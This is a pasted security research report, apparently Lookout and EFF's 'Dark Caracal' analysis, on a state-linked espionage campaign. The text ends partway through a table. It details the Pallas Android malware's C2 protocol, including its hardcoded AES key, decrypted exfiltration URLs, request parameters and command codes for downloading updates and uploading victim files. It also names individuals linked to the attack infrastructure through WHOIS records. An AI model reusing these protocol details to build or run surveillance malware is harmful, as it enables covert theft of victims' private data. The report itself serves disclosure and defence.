· 8 years ago · Jan 25, 2018, 11:26 AM
1 1
2Dark Caracal
3Cyber-espionage at a Global Scale
4SECURITY RESEARCH REPORT
5 2
6Contents
7Executive Summary 1
8Key Findings 2
9Timeline 2
10Background 4
11Lebanon’s General Directorate of General Security (GDGS) 4
12Locating Attacker Facilities 5
13Test Devices 5
14Wi-Fi Networks 5
15Location Information from IP Addresses 6
16Identities: Attacker Personas 7
17Nancy Razzouk and Hassan Ward 7
18Hadi Mazeh 8
19Rami Jabbour 8
20Prolific Activity 9
21Exfiltrated Data 9
22Android Malware Content 12
23Windows Malware Content 15
24Patterns of Attacks 17
25The Initial Compromise 17
26Social Engineering and Spear-Phishing 19
27Surveillanceware — Mobile Capabilities 21
28Pallas — Dark Caracal’s Custom Android Samples 21
29C2 Communications with Malware Implants 23
30Previous Use of FinFisher Spyware 30
31Surveillanceware — Desktop Components 31
32Bandook 31
33CrossRAT 34
34Infected Documents 36
35Other Samples 37
36Infrastructure 38
37Primary Command and Control Server 39
38Watering Hole Server 41
39Phishing Domains 41
40Windows C2 Servers 44
41Appendix 46
42Indicators of Compromise and Actor Tracking 46
43Mobile Implant Apps 47
44Desktop Implant Apps 48
45 1
46SECURITY RESEARCH REPORT
47Executive Summary
48As the modern threat landscape has evolved, so have the actors. The barrier to entry for cyber-warfare has continued to
49decrease, which means new nation states — previously without significant offensive capabilities1 — are now able to build and
50deploy widespread multi-platform cyber-espionage campaigns.
51This report uncovers a prolific actor with nation-state level advanced persistent threat (APT) capabilities, who is exploiting targets
52globally across multiple platforms. The actor has been observed making use of desktop tooling, but has prioritized mobile
53devices as the primary attack vector. This is one of the first publicly documented mobile APT actors known to execute espionage
54on a global scale.
55Lookout and Electronic Frontier Foundation (EFF) have discovered Dark Caracal2, a persistent and prolific actor, who at the time
56of writing is believed to be administered out of a building belonging to the Lebanese General Security Directorate in Beirut. At
57present, we have knowledge of hundreds of gigabytes of exfiltrated data, in 21+ countries, across thousands of victims. Stolen
58data includes enterprise intellectual property and personally identifiable information. We are releasing more than 90 indicators
59of compromise (IOC) associated with Dark Caracal including 11 different Android malware IOCs; 26 desktop malware IOCs
60across Windows, Mac, and Linux; and 60 domain/IP based IOCs.
61Dark Caracal targets include individuals and entities that a nation state might typically attack, including governments, military
62targets, utilities, financial institutions, manufacturing companies, and defense contractors. We specifically uncovered data
63associated with military personnel, enterprises, medical professionals, activists, journalists, lawyers, and educational institutions
64during this investigation. Types of data include documents, call records, audio recordings, secure messaging client content,
65contact information, text messages, photos, and account data.
66The joint Lookout-EFF investigation began after EFF released its Operation Manul report, highlighting a multi-platform espionage
67campaign targeted at journalists, activists, lawyers, and dissidents who were critical of President Nursultan Nazarbayev’s regime
68in Kazakhstan. The report describes malware and tactics targeting desktop machines, with references to a possible Android
69component. After investigating related infrastructure and connections to Operation Manul, the team concluded that the same
70infrastructure is likely shared by multiple actors and is being used in a new set of campaigns.
71The diversity of seemingly unrelated campaigns that have been carried out from this infrastructure suggests it is being used
72simultaneously by multiple groups. Operation Manul clearly targeted persons of interest to Kazakhstan, while Dark Caracal has
73given no indication of an interest in these targets or their associates. This suggests that Dark Caracal either uses or manages the
74infrastructure found to be hosting a number of widespread, global cyber-espionage campaigns.
75Since 2007, Lookout has investigated and tracked mobile security events across hundreds of millions of devices around the world.
76This mobile espionage campaign is one of the most prolific we have seen to date. Additionally, we have reason to believe the
77activity Lookout and EFF have directly observed represents only a small fraction of the cyber-espionage that has been conducted
78using this infrastructure.
791 https://www.checkpoint.com/downloads/volatile-cedar-technical-report.pdf
802 In keeping with traditional APT naming, we chose the name “Caracal†(pronounced [kar-uh-kal]) because the feline is native to Lebanon and because this group has
81remained hidden for so long. From the Wikipedia entry “the caracal is highly secretive and difficult to observe†and “is often confused with [other breeds of cat].†The
82naming further builds on EFF’s “Operation Manul,†another feline reference. We like cats.
83 2
84SECURITY RESEARCH REPORT
85Key Findings
86Lookout and EFF researchers have identified a new threat actor,
87Dark Caracal.
88• Our research shows that Dark Caracal may be administering its
89tooling out of the headquarters of the General Directorate of
90General Security (GDGS) in Beirut, Lebanon.
91• The GDGS gathers intelligence for national security purposes and
92for its offensive cyber capabilities according to previous reports.
93• We have identified four Dark Caracal personas with overlapping
94TTP (tools, techniques, and procedures).
95• Dark Caracal is using the same infrastructure as was previously
96seen in the Operation Manul campaign, which targeted journalists,
97lawyers, and dissidents critical of the government of Kazakhstan.
98Dark Caracal has been conducting a multi-platform, APT-level
99surveillance operation targeting individuals and institutions globally.
100• Dark Caracal has successfully run numerous campaigns in parallel
101and we know that the data we have observed is only a small
102fraction of the total activity.
103• We have identified hundreds of gigabytes of data exfiltrated from
104thousands of victims, spanning 21+ countries in North America,
105Europe, the Middle East, and Asia.
106• The mobile component of this APT is one of the first we’ve seen
107executing espionage on a global scale.
108• Analysis shows Dark Caracal successfully compromised the
109devices of military personnel, enterprises, medical professionals,
110activists, journalists, lawyers, and educational institutions.
111• Dark Caracal targets also include governments, militaries,
112utilities, financial institutions, manufacturing companies, and
113defense contractors.
114• Types of exfiltrated data include documents, call records, audio
115recordings, secure messaging client content, contact information,
116text messages, photos, and account data.
117Dark Caracal Activity Timeline
118Jan. 2012
119Nov. 2012
120Mar. 2014
121Nov. 2014
122Dec. 2015
123Jun. 2015
124Dec. 2016
125Aug. 2016
126Jun. 2016
127Custom FinFisher mobile
128sample created
129First mobile surveillance
130campaign, oldb, launched
131arablivenews[.]com expires and
132is decommissioned
133op13@mail[.]com registers phishing
134domain arablivenews[.]com
135op13@mail[.]com registers
136arabpublisherslb[.]com domain
137Operation Manul phishing
138emails first seen
139secureandroid[.]info watering
140hole goes live.
141EFF releases “Operation Manul†report
142gmailservices[.]org and
143twiterservices[.]org WHOIS
144details registered as Hadi
145Mazeh and op13@mail[.]com
146Oct. 2016 op13@mail[.]com registered
147arablivenews[.]com. Threat
148Connect report3 suggests
149domain may be related to “APT 28â€
1503 “https://www.threatconnect.com/blog/how-to-investigate-incidents-in-threatconnect/â€
151Dec. 2016 Second mobile surveillance
152campaign, wp7, launched
153 3
154SECURITY RESEARCH REPORT
155• Dark Caracal follows the typical attack chain for cyber-espionage.
156They rely primarily on social media, phishing, and in some cases
157physical access to compromise target systems, devices, and accounts.
158Dark Caracal uses tools across mobile and desktop platforms.
159• Dark Caracal uses mobile as a primary attack platform.
160• Dark Caracal purchases or borrows mobile and desktop tools from
161actors on the dark web.
162• Lookout discovered Dark Caracal’s custom-developed mobile
163surveillanceware (that we call Pallas) in May 2017. Pallas is found in
164trojanized Android apps.
165• Dark Caracal has also used FinFisher, a tool created by a “lawful
166intercept†company that is regularly abused by other nation-state actors.
167• Dark Caracal makes extensive use of Windows malware called
168Bandook RAT. Dark Caracal also uses a previously unknown, multiplatform
169tool that Lookout and EFF have named CrossRAT, which is
170able to target Windows, OSX, and Linux.
171Dark Caracal uses a constantly evolving, global infrastructure.
172• Lookout and EFF researchers have identified parts of Dark
173Caracal’s infrastructure, providing us with unique insight into
174its global operations.
175• The infrastructure operators prefer to use Windows and XAMPP
176software on their C2 servers rather than a traditional LAMP stack, which
177provides a unique fingerprint when searching for related infrastructure.
178• Lookout and EFF have identified infrastructure shared by
179Operation Manul and Dark Caracal as well as other actors.
180• Attributing Dark Caracal was difficult as the actor employs
181multiple types of malware, and our analysis suggests the
182infrastructure is also being used by other groups.
183Lookout and EFF are releasing more than 90 indicators of
184compromise (IOC):
185• 11 Android malware IOCs
186• 26 desktop malware IOCs
187• 60 domains, IP Addresses, and WHOIS information
188Dark Caracal Activity Timeline (cont.)
189Mar. 2017
190Apr. 2017
191Jun. 2017
192Jul. 2017
193Jul. 2017
194Jul. 2017
195Aug. 2017
196Aug. 2017
197Aug. 2017
198Sep. 2017
199Dec. 2017
200Jan. 2018
201Sep. 2017
202Third mobile surveillance
203campaign, wp8, launched
204Fourth mobile surveillance
205campaign, wp9, launched
206Fifth and sixth mobile surveillance
207campaigns, wp10 and wp10s, launched
208wp8 campaign ceases collecting data
209adobeair[.]net taken down for
210several dayss
211adobeair[.]net resumes operations
212wp9, wp10, and wp10s campaigns
213cease collecting data
214adobeair[.]net WHOIS details
215changed to Nancy Razzouk,
216op13@mail[.]com, Lebanon
217oldb campaign ceases collecting data
218wp7 campaign ceases collecting data
219Secureanroid[.]info’s domain
220name expires
221Dark Caracal made public
222adobeair[.]net changes hosting
223and is secured against data leaks
224 4
225SECURITY RESEARCH REPORT
226Background
227Lebanon’s General Directorate of General
228Security (GDGS)
229Devices for testing and operating the campaign were traced back to a building
230belonging to the Lebanese General Directorate of General Security (GDGS), one of
231Lebanon’s intelligence agencies. Based on the available evidence, it is likely that the
232GDGS is associated with or directly supporting the actors behind Dark Caracal.
233Previous Cyberespionage
234EFF first identified elements of this infrastructure in its August 20164
235 report on Operation
236Manul. The report details a series of attacks targeting journalists and political activists
237critical of Kazakhstan’s authoritarian government, along with their family members,
238lawyers, and associates. EFF’s research noted references to Android components found
239on the infrastructure; however, no samples had been discovered at the time of the
240report’s release. Lookout has since acquired Android samples used by Dark Caracal that
241belong to what Lookout researchers have named the Pallas malware family.
242Citizen Lab previously flagged the General Directorate of General Security in a 2015
243report as one of two Lebanese government organizations using the FinFisher spyware5.
244The report cites evidence showing that the GDGS, along with other state actors around
245the world, had active campaigns using FinFisher infrastructure and tools. However, the
246report did not specify whether the spyware used was the mobile version of FinFisher.
247Our investigation resulted in the discovery of at least one FinFisher implant for Android,
248which corroborates Citizen Lab’s previous research. The sample’s hash is provided in
249the appendix of this report. We also uncovered new desktop surveillance software
250developed potentially by Dark Caracal themselves, a developer associated with the
251GDGS, or a private contractor group.
252The intent of bringing forth these findings is to reveal newly discovered evidence of a new
253nation-state actor compromising the devices of military personnel, enterprises, medical
254professionals, activists, journalists, lawyers, and educational institutions. Our review and
255disclosure of this matter follows industry practices, including sharing our findings with
256appropriate government authorities, industry partners and the public at large.
2574 https://www.eff.org/files/2016/08/03/i-got-a-letter-from-the-government.pdf
2585 https://citizenlab.ca/2015/10/mapping-finfishers-continuing-proliferation/
259 5
260SECURITY RESEARCH REPORT
261Locating Attacker Facilities
262We correlated information from test devices and Wi-Fi networks to determine
263the location of Dark Caracal’s facilities.
264Test Devices
265Dark Caracal used a series of test devices to confirm that its malware implants
266and C2 infrastructure work correctly. Identifying these devices helped us to
267determine Dark Caracal’s likely location inside the GDGS building.
268Distinguishing between test and target devices can be tricky. After analyzing
269data from the infrastructure, we noticed that a subset of the compromised
270devices contained similar email, Viber, Primo, Telegram, and Whatsapp accounts.
271These data points allowed us to focus on a select few devices that were unique
272among the thousands we saw. Additionally, these devices contained a minimal
273amount of (if any) real content in the exfiltrated text messages, contacts, and
274application data, which led us to conclude they were likely test devices.
275Figure 1: A picture of the GDGS building in
276Beirut, Lebanon from where we have located
277Dark Caracal operating
278Wi-Fi Networks
279Within the cluster of test devices we noticed what could be unique Wi-Fi networks. Knowing that Wi-Fi networks can be used for
280location positioning, we used that data to geo-locate where these devices may have been by keying off network identifiers. We
281specifically focused on the Wi-Fi network SSID Bld3F6. Using the Wi-Fi geolocation service Wigle.net we saw these test device
282Wi-Fi networks mapped to Beirut. We also noticed Wi-Fi networks with SSID Bld3F6 mapped near the General Security building
283in Beirut, Lebanon.
284Figure 2: Google map of the GDGS Building in Beirut
285Left: Data as observed from Wigle.net for SSID: Bld3F6 | Right: Data confirming location of SSID: Bld3F6
286 6
287SECURITY RESEARCH REPORT
2886 https://en.wikipedia.org/wiki/Telecommunications_in_Lebanon
289Location Information from IP Addresses
290Throughout the course of this investigation we observed logins into the administrative console of the C2 server come from three
291IP addresses. The IP addresses are all from Ogero Telecom6, which is owned by the Government of Lebanon. We geo-located two
292of the IP addresses just south of the GDGS’s building (probably a switching or central hub for Ogero).
293Figure 3: The location of IP addresses that logged into the adobeair[.]net admin console between July and September 2017
294 7
295SECURITY RESEARCH REPORT
296Nancy Razzouk and Hassan Ward
297We identified Nancy Razzouk listed alongside the op13@mail[.]com email address in domain WHOIS information. We also found
298this name in signer content for the Windows malware7 that communicates with adobeair[.]net.
299Figure 4: Signer content for Windows malware
300The contact details for Nancy present in WHOIS information matched the public listing for a Beirut-based individual by that
301name. When we looked at the phone number associated with Nancy in the WHOIS information, we discovered the same number
302listed in exfiltrated content and being used by an individual with the name Hassan Ward.
3037 SHA-256 HASH: d57701321f2f13585a02fc8ba6cbf1f2f094764bfa067eb73c0101060289b0ba
304Identities: Attacker Personas
305The infrastructure used by Dark Caracal revealed several different associated personas. This resulted in the team linking four
306different aliases, two domains, and two phone numbers to this infrastructure. At the center of these personas is the email
307address op13@mail[.]com which has appeared at various stages in the historical WHOIS information of Dark Caracal domains
308(see: Timeline).
309Aliases associated with op13@mail[.]com include Nancy Razzouk, Hadi Mazeh, and Rami Jabbour. All of the physical addresses
310listed in the WHOIS domain registrations associated with op13@mail[.]com tend to cluster around the SSID: Bld3F6 Wi-Fi
311locations. This is near the General Security building in Beirut.
312 8
313SECURITY RESEARCH REPORT
314op13@mail.com
315fbarticles.com
316gmailservices.org
317twiterservices.org
318arabpublisherslb.com
319facebookservices.org
320Hadi Mazeh
321Hadi Mazeh
322During July 2017, Dark Caracal’s internet service provider took the adobeair[.]net command and control server offline. Within
323a matter of days, we observed it being re-registered to the email address op13@mail[.]com with the name Nancy Razzouk. This
324allowed us to identify several other domains listed under the same WHOIS email address information, running similar server
325components. The WHOIS name field, however, listed several entries with the name Hadi Mazeh. This suggests that either multiple
326individuals are using the op13 email address or the owner has several aliases that he or she uses with it.
327Rami Jabbour
328We determined the actor behind the op13 email address also registered the domain arablivenews[.]com and provided the name
329Rami Jabbour. Address details listed in WHOIS information for this specific entry are Salameh Blg, Museum Str, and Mathaf, which
330appears to be in close proximity to where we have seen test devices in Beirut.
331Figure 5: Aliases associated with the op13 email address
332 9
333SECURITY RESEARCH REPORT
334Prolific Activity
335Throughout this investigation, Lookout and EFF researchers have gained unique insight into the global operations of Dark
336Caracal. This has primarily been possible due to command and control infrastructure operators allowing public access to data
337stolen from compromised devices and systems.
338Since we first gained visibility into attacker infrastructure in July 2017, we have seen millions of requests being made to it from
339infected devices. This demonstrates that Dark Caracal is likely running upwards of six distinct campaigns in parallel, some of
340which have been operational since January 2012.
341Dark Caracal targets a broad range of victims. Thus far, we have identified members of the military, government officials, medical
342practitioners, education professionals, academics, civilians from numerous other fields, and commercial enterprises as targets.
343Exfiltrated Data
344*****
345Bookmarks &
346Browsing History
347Installed
348Applications
349Audio
350Recordings
351Account
352Information
353Call
354Records
355Contacts
356Images
357SMS
358Messages
359WhatsApp, Telegram
360and Skype databases
361Legal and Corporate
362Documentation
363File and Directory
364Listings
365Wi-Fi
366Details
367Figure 6: A summary of some of the types of content Dark Caracal exfiltrated from victims on both Android and Windows
368Not only was Dark Caracal able to cast its net wide, it was also able to gain deep insight into each of the victim’s lives. It did this
369through a series of multi-platform surveillance campaigns that began with desktop attacks and pivoted to the mobile device.
370Stolen data was found to include personal messages and photos as well as corporate and legal documentation. In some cases,
371screenshots from its Windows malware painted a picture of how a particular individual spent his evenings at home.
372 10
373SECURITY RESEARCH REPORT
374We found the largest collection of data from a single command and control server that operated under the domain adobeair[.]
375net. Over a short period of observation, devices from at least six distinct Android campaigns communicated with this domain
376resulting in 48GB of information being exfiltrated from compromised devices. Windows campaigns contributed a further 33GB of
377stolen data. The remainder of the data contained desktop malware samples, spreadsheet reports on victims, and other files.
378Victims were found to speak a variety of languages and were also from a wide range of countries. We discovered messages
379and photos in Arabic, English, Hindi, Turkish, Thai, Portuguese, and Spanish in the examined data. According to our analysis,
380infrastructure contained exfiltrated data from individuals residing in:
381Figure 7: Split of exfiltrated data found
382on just the command and control server
383adobeair[.]net. From 81GB of stolen
384data, the majority was found to be from
385campaigns run against mobile devices 81 GB
38681GB
38759.3%
388Android
389Campaigns
39040.7%
391Windows
392Campaigns
393Split of exfiltrated content on adobeair.net
394China France Germany India Italy Jordan Lebanon
395Nepal Netherlands Pakistan Philippines Qatar Russia Saudi Arabia
396South Korea Switzerland Syria Thailand United States Venezuela Vietnam
397 11
398SECURITY RESEARCH REPORT
399Based on both the mobile and desktop campaigns we observed, we believe the attacker first exfiltrated information in January
4002012. At the time of writing this report, it looks as though Dark Caracal is still uploading data from its spy campaigns, according
401to the servers we are tracking.8
402Figure 8: Observed locations of compromised devices
403Figure 9: Amount of exfiltrated content (as represented by “count†in the graph above) being uploaded for certain campaigns on adobeair[.]net over time for 2017
4048 Despite the internet service provider taking the command and control server down in July 2017, the infrastructure reappeared online again after a few days. The dip
405in data exfiltration due to the takedown can be observed in Figure 9 at the beginning of August. The average number of files uploaded to the server increases steadily
406with time.
407 12
408SECURITY RESEARCH REPORT
409Android Malware Content
410The Android malware family mainly trojanizes messaging and security applications and, once it compromises a device, it is
411capable of collecting a range of sensitive user information. This includes recorded audio, call logs, conversations from popular
412chat applications, location information, browsing history, device specific metadata, contacts, and much more.
413Each Android malware sample contains a hard coded identifier that we believe represents the campaign to which it belongs.
414When a Dark Caracal operator instructs an infected device to upload sensitive data, it is stored on the attacker infrastructure
415under this campaign. While investigating this adversary, we observed content distributed across six different campaigns. In
416this report, we refer to these campaigns by the name of the directory to which infected devices uploaded victim data. These
417campaigns are listed below, along with the number of victim devices we believe Dark Caracal compromised while we were
418observing its operations:
419• /oldb - 28 perceived test devices, 454 potential victim devices
420• /wp7 - 4 perceived test devices, 117 potential victim devices
421• /wp8 - 1 perceived test device, 4 potential victim devices
422We did not attempt to identify targets and consider that beyond the scope of this report.
423*****
424486,766
425SMS Texts
42632.4%
427252,982
428Contacts
42916.9%
430150,266
431Call Records
43210.0%
43345,264
434Android Application
435Details
4363.0%
43792,35
438Browsing History URLs
4396.2%
4401547
441Authentication Accounts
4420.1%
443206,461
444Unique Wi-Fi SSIDs
44513.8%
44646
447Directories
4480.0%
449264,535
450Files
45117.6%
452• /wp9 - 11 potential victim devices
453• /wp10 - 1 potential test device, 2 potential victim devices
454• /wp10s - 13 potential test devices, 21 potential victim devices
455An overview of exfiltrated data from the Android campaigns can be seen in the figure below.
456Figure 10: Distribution of data from the Android campaigns
457 13
458SECURITY RESEARCH REPORT
459Exfiltrated data can be divided into the following categories of information:
460• SMS messages - SMS messages made up some of the more meaningful exfiltrated data. Messages included personal texts,
461two-factor authentication and one-time password pins, receipts and airline reservations, and company communications.
462Some pin codes were within their validity window at the time of writing this report.
463Figure 11: Exfiltrated SMS texts detailing OTPs, receipts, and Facebook notifications
464 14
465SECURITY RESEARCH REPORT
466• Contact Lists - This data included numbers, names, addresses, bank passcodes, PIN numbers, how many times each contact
467was dialed, and the last time the contact was called.
468• Call logs - This data included a full record of incoming, outgoing, and missed calls along with the date and duration
469of the conversation.
470• Installed Applications - This data included app names and version numbers.
471• Bookmarks and Browsing History - This data included bookmarks and browsing history from web pages. This data was
472seen in only one Android campaign called oldb, but it clearly identified victims that were active in political discourse.
473• Connected Wi-Fi Details - This data included observed Wi-Fi access point names, BSSIDs, and signal point strength.
474• Authentication Accounts - This data included the login credentials and which applications are using it.
475• File and Directory Listings - This data included a list of personal files, downloaded files, and temporary files, including
476those used by other applications.
477• Audio Recordings and Audio Messages - This data included audio recordings of conversations, some of which identified
478individuals by name.
479• Photos - This data included all personal and downloaded photographs, including profile pictures.
480Figure 12: Contacts exfiltrated from 3 victims’ Android devices can be seen to contain corporate numbers, personal numbers, and Visa credit card numbers
481 15
482SECURITY RESEARCH REPORT
483Windows Malware Content
484Dark Caracal’s use of Windows malware includes a wider range of command and control infrastructure beyond adobeair[.]net.
485Its methods and data collection, however, are similar to the Android malware.
486Exfiltrated data from the Windows malware included the following general categories:
487• Desktop Screenshots - This data included full screenshots taken at regular intervals and uploaded to adobeair[.]net.
488By observing these images, it is disturbingly simple to watch a victim go about his daily life and follow that individual
489every step of the way.
490Figure 13: A screenshot exfiltrated from victim’s Windows device on adobeair[.]net
491• Skype Logs Databases - The data included the entire Skype AppData folder for certain victims, including messaging
492databases.
493• Photos - This data included complete contents of the ‘Pictures’ folder from compromised Windows machines. It is common
494to see smartphone photos backed up to this location, which most often contains personal photographs of family and friends
495taken by the individual being targeted.
496 16
497SECURITY RESEARCH REPORT
498Figure 14: An example of corporate documentation, which details the addresses and telephone numbers of customers for a shipping company
499• iPhone Backups - This data included an entire unencrypted backup of a victim’s iPhone.
500• File Listings - This data included all default Windows folders and file listings.
501• Corporate and Legal Documentation - This data included a large collection of company-specific documents. Specifically,
502we discovered these on another live command and control server, planethdx[.]com.
503 17
504SECURITY RESEARCH REPORT
505Exfiltrated
506Data
507Phishing messages
508WhatsApp
509Physical access Phishing messages
510Facebook group
511Trojanized Android Apps
512Watering hole server:
513secureandroid[.]info
514C2 server
515adobeair[.]net
516Phishing server:
517Set up for credential harvesting
518Fake Google domain
519Fake Facebook domain
520Fake Twitter domain
521Patterns of Attacks
522Dark Caracal follows the typical attack chain for client-side cyber-espionage. Mobile tools include a custom written Android
523surveillanceware implant Lookout named Pallas9 and a previously unknown FinFisher sample. The group’s desktop tools include
524the Bandook malware family and a newly discovered desktop surveillanceware tool that we have named CrossRAT, which is able
525to infect Windows, Linux, and OS X operating systems.
526The Initial Compromise
527Figure 15: The Android malware infrastructure
528is designed to attract victims into the campaign
529through two different mechanisms: phishing
530campaigns that separately lead to a watering hole
531server (secureandroid[.]info) and a server designed
532to accept credentials via a spoofed login
5339 Pallas’ Cat is another name for “Manul,†a reference to EFF’s Op Manul campaign on this actor
534Dark Caracal relies primarily on social engineering via posts on a Facebook group and WhatsApp messages in order to
535compromise target systems, devices, and accounts. At a high-level, the attackers have designed three different kinds of phishing
536messages, the goal of which is to eventually drive victims to a watering hole controlled by Dark Caracal.
537 18
538SECURITY RESEARCH REPORT
539The group distributes trojanized Android
540applications with the Pallas malware through its
541watering hole, secureandroid[.]info. Many of these
542downloads include fake messaging and privacyoriented
543apps.
544There is also some indication that Dark Caracal
545has used physical access in the past to install the
546Android malware.
547Figure 16: secureandroid[.]info’s app download page
548Figure 17: A text message found
549from a possible victim’s device
550 19
551SECURITY RESEARCH REPORT
552Social Engineering and Spear-Phishing
553Dark Caracal uses phishing messages through popular applications, such as WhatsApp, in order to direct people to the
554watering hole.
555Dark Caracal infrastructure hosts phishing sites, which look like login portals for well known services, such as Facebook, Twitter,
556and Google. We found links to these pages in numerous Facebook groups that included “Nanys†in their titles. These groups are
557listed in the appendix.
558Figure 18:
559Left: Extracted from WhatsApp
560messages database
561Right: Facebook group links to
562watering hole
563Figure 19: Dark Caracal
564credential phishing portals
565 20
566SECURITY RESEARCH REPORT
567Google has indexed several of these phishing campaigns from the tweetsfb[.]com server. We were able to link a number of
568phishing domains dating to the mid-to-late 2016 time period from this data. We believe the attackers used these phishing servers
569to capture login credentials, hijack accounts, and to push out more spoofed messages to widen their pool of victims.
570Phishing links posted in Dark Caracal linked Facebook groups include politically themed news stories, links to fake versions of
571popular services, such as Gmail, and links to trojanized versions of WhatsApp.
572Figure 20: Google indexing of tweetsfb[.]com campaigns
573Figure 21: Dark Caracal phishing links posted on Facebook
574 21
575SECURITY RESEARCH REPORT
576Four Facebook profiles similar in theme “liked†the phishing groups. Dark Caracal likely used these fake profiles to initiate
577communication with victims and build a rapport before directing them either to content on the “Nanys†Facebook groups
578or to the secureandroid[.]info domain directly.
579Surveillanceware — Mobile Capabilities
580Pallas — Dark Caracal’s Custom Android Samples
581Using our global sensor network, Lookout researchers identified 11 unique Android surveillanceware apps tied to the Operation
582Manul campaign10. The trojanized apps still retain the legitimate functionality of the apps they spoof and behave as intended.
583The apps are found predominantly in trojanized versions of well-known secure messaging apps including:
584• Signal (org.thoughtcrime.securesms)
585• Threema (ch.threema.app)
586• Primo (com.primo.mobile.android.app)
587• WhatsApp (com.gbwhatsapp)
588• Plus Messenger (org.telegram.plus)
589We also identified Pallas in trojanized versions of two apps aimed at users seeking to protect themselves and their data online:
590• Psiphon VPN (com.psiphon3)
591• Orbot: TOR Proxy (org.torproject.android)
59210 http://www.cmcm.com/blog/en/security/2017-08-16/1101.html
593Figure 22: Dark Caracal fake Facebook profiles
594 22
595SECURITY RESEARCH REPORT
596Finally, with help from Google’s Android Security team, we discovered Pallas lurking in several apps purporting to be Adobe Flash
597Player and Google Play Push for Android:
598• Flash Player (com.flashplayer.player)
599• Google Play Push (com.flashplayer.player)
600Neither the desktop nor the mobile malware tooling use zero day vulnerabilities. Pallas samples primarily rely on the permissions
601granted at installation in order to access sensitive user data. However, there is functionality that allows an attacker to instruct an
602infected device to download and install additional applications or updates. Theoretically this means it’s possible for the operators
603behind Pallas to push specific exploit modules to compromised devices in order to gain complete access.
604We found no attacker infrastructure containing rooting packages. This highlights that, in many cases, advanced exploitation
605capabilities like those shown by surveillance tools such as Pegasus for iOS and Chrysaor for Android (that targeted both Android11
606and iOS12 devices), are not essential, but helpful when targeting certain platforms.
60711 https://blog.lookout.com/pegasus-android
60812 https://blog.lookout.com/trident-pegasus
609Primo Signal
610 WhatsApp Plus
611Messenger
612Threema
613Orbot
614TOR Proxy
615Psiphon
616Figure 23: Dark Caracal trojanized Android apps
617 23
618SECURITY RESEARCH REPORT
619The Pallas first stage is capable of performing the following surveillance functionality on a compromised device:
620• Take photos with front or back camera
621• Exfiltrate all text messages including those
622received in the future
623• Retrieve latitude / longitude from GPS
624• Silently activate the device microphone to
625capture audio
626• Retrieve contacts
627• Scan nearby Wi-Fi access points and exfiltrate
628information about them, including their BSSID, SSID,
629authentication, key management, encryption schemes,
630signal strength, and frequency
631• Retrieve chat content from secure messaging
632applications (this only applies when a victim is using
633a secure messaging app that has been trojanized
634with Pallas)
635• Retrieve device metadata
636• Retrieve text messages
637• Retrieve information about all accounts
638• Send an SMS to an attacker-specified number
639• Retrieve call logs
640• Retrieve messages and any corresponding
641decryption keys from messaging apps
642• Retrieve a list of installed packages
643• Download and install additional apps
644• Upload attacker specified files
645• Delete attacker specified files and directories
646• Harvest credentials via phishing pop-ups
647C2 Communications with Malware Implants
648All samples belonging to the Pallas malware family have the same capabilities and functionality described in the previous
649section. However, obfuscation did differ between them. For reference, code snippets shown in the following section
650have been taken from a trojanized version of WhatsApp with a package name of com.gbwhatsapp and a SHA1 hash of
651ed4754effda466b8babf87bcba2717760f112455.
652Like most other surveillanceware, communication with the C2 includes three main phases:
6531. Regular beaconing to the remote HTTP server.
6542. Handling any outstanding attacker specified commands.
6553. Exfiltration / uploading of victim data to C2 servers.
656Pallas samples have a number of different entry points via broadcast receivers, specifically the C2 communications reside
657in the com.receive.MySe.
658 24
659SECURITY RESEARCH REPORT
660In all Pallas samples Lookout analyzed, domain information and URL paths are hardcoded as encrypted values. The actor uses
661AES encryption and chose to use the secret key of Bar12345Bar12345 and initialization vector of RandomInitVector, which
662appears in a post describing how to use AES encryption in Java13.
663Examples of AES encrypted, base64 encoded domains and URL paths present in some Pallas samples include:
664• krgbAdOUCGKEnuCRp5s+eE2eMWUktZQR64RBdkNoH/O0NFo9ByRTFhjqa2UX2Y9k
665• krgbAdOUCGKEnuCRp5s+eA/hX2erfMp+49exa+8zoZgMlBICjGuOSqrvGRCjgrZ4
666These two examples decrypt to:
667• https://adobeair[.]net/wp9/add.php
668• https://adobeair[.]net/wp9/upload.php
669The general format of Pallas requests can be written as https://adobeair[.]net/<campaign_identifier>/<add.php or upload.php>.
670The add.php script is used for several operations, including compromised device check-ins as well as C2 instruction execution.
671We also determined that it is able to retrieve location information (GPS data) and general metadata about a victim’s device. The
672following table provides additional details around the structure of these requests. In all cases, the Content-Type header is set to
673application/x-www-form-urlencoded. The listed ac parameter identifies the type of request made to the C2.
67413 https://stackoverflow.com/questions/15554296/simple-java-aes-encrypt-decrypt-example
675Figure 24: Actions that trigger the Pallas malware samples to do work
676 25
677SECURITY RESEARCH REPORT
678Description Purpose
679Of The Request
680HTTP Parameters(Key=Value)
681Required
682Retrieve data from a compromised device,
683including text messages, calls, contact
684information, Wi-Fi details, and accounts.
685Parameter pr is “1†if sufficient permissions
686exist, “0†otherwise, and “111111111111â€, if the
687build version of the device is lower than 23.
688Check-In with C2 ac=chkcm1
689uid=<device_id>
690pr=<app_has_permisions>
691The victim’s GPS location is communicated to
692the C2 every 120 minutes.
693GPS location ac=chkcm1
694uid=<device_id>
695alt=<Latitude>
696long=<Longtitude>
697Request responsible for gathering general
698device metadata and uploading to C2. This
699request is triggered via several entry points
700including, but not limited to, the creation of the
701app on the device.
702General Device Information ac=iu
703uid=<DeviceID>
704imei=<DeviceID>
705nb=<None>
706os=<ReleaseBuildVersion>
707man=<ManufacturerModel>
708op=<NetworkOperatorName>
709wifi=<IsConnectedToNetwork>
710cam=†<NumberOfCameras>
711ver=<versionOftheApp>
712pr=<permisionsGranted>
713idt=<CurrentDate>
714ecr=<ExistAcall_record>
715Responses from C2 infrastructure to devices infected with Pallas consist of chunks of data separated by a “~!â€. The following
716table shows the commands that are currently supported. Some of these require the victim’s device to report back to the C2
717and/or upload files to it via HTTP POST requests. The responses to the attacker commands detailed below are handled via the
718add.php page.
719 26
720SECURITY RESEARCH REPORT
721Description C2
722Command
723HTTP Parameters(Key=Value)
724Required
725Retrieve all the data from a compromised device, including text message, call
726information, contact details, Wi-Fi data, and account information to name a few.
727GALL1
728Toggle the call record functionality to on or off. REC2
729Upload file and directory access logs of the trojanized application to the C2
730via a single file.
731GFILE1
732Take a picture using the front or rear camera and upload to the C2 server. CAMG1
733Download an update from attacker infrastructure, attempt to execute it,
734and notify the C2.
735UPD1 ac=REPX
736uid=<Device_ID>
737RP=Update Procedure Executed
738Delete an attacker-specified file from the device and notify the C2. DELF1 ac=REPX
739uid=<Device_ID>
740RP=File Deleted : <file_name>
741Retrieve an attacker-specified file from a compromised device,
742 uploading it to the C2.
743UPF1
